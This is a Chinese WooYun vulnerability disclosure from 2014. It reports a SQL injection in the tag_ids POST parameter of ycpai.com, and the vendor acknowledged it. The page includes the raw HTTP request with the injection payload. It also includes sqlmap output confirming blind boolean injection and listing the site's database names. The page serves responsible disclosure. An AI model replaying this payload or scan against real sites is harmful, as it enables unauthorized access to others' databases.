当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077418

漏洞标题:缘创派某处SQL注射漏洞

相关厂商:ycpai.com

漏洞作者: kobin97

提交时间:2014-09-26 15:13

修复时间:2014-11-10 15:14

公开时间:2014-11-10 15:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-26: 细节已通知厂商并且等待厂商处理中
2014-09-26: 厂商已经确认,细节仅向厂商公开
2014-10-06: 细节向核心白帽子及相关领域专家公开
2014-10-16: 细节向普通白帽子公开
2014-10-26: 细节向实习白帽子公开
2014-11-10: 细节向公众公开

简要描述:

缘创派ycpai.com某处SQL注射

详细说明:

POST /tags/book_tag/0 HTTP/1.1
Host: www.ycpai.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.ycpai.com/tags/book_tag
Cookie: cookie
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Connection: Keep-Alive
tag_ids%5B%5D=113&tag_ids%5B%5D=106&tag_ids%5B%5D=1 and 1=if((1=2),1,(select 1 union select 2))


注入点 tag_ids

漏洞证明:

[*] starting at 14:49:27
[14:49:27] [INFO] parsing HTTP request from '1.txt'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
[14:49:29] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://www.ycpai.com/'. Do you want to follow? [Y/n] n
[14:49:31] [INFO] testing if the provided string is within the target URL page content
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tag_ids[]=113&tag_ids[]=106&tag_ids[]=1 and 1=if((1=1 ) AND 5165=5165 AND (8198=8198 ),1,(select 1 union select 2))
---
[14:49:31] [INFO] testing MySQL
[14:49:31] [INFO] confirming MySQL
[14:49:31] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.27
back-end DBMS: MySQL >= 5.0.0
[14:49:31] [INFO] fetching database names
[14:49:31] [INFO] fetching number of databases
[14:49:31] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:49:31] [INFO] retrieved: 2
[14:49:34] [INFO] retrieved: information_schema
[14:50:57] [INFO] retrieved: app_ycpai
available databases [2]:
[*] app_ycpai
[*] information_schema

修复方案:

过滤

版权声明:转载请注明来源 kobin97@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-09-26 15:49

厂商回复:

谢谢

最新状态:

暂无

漏洞评价:

评论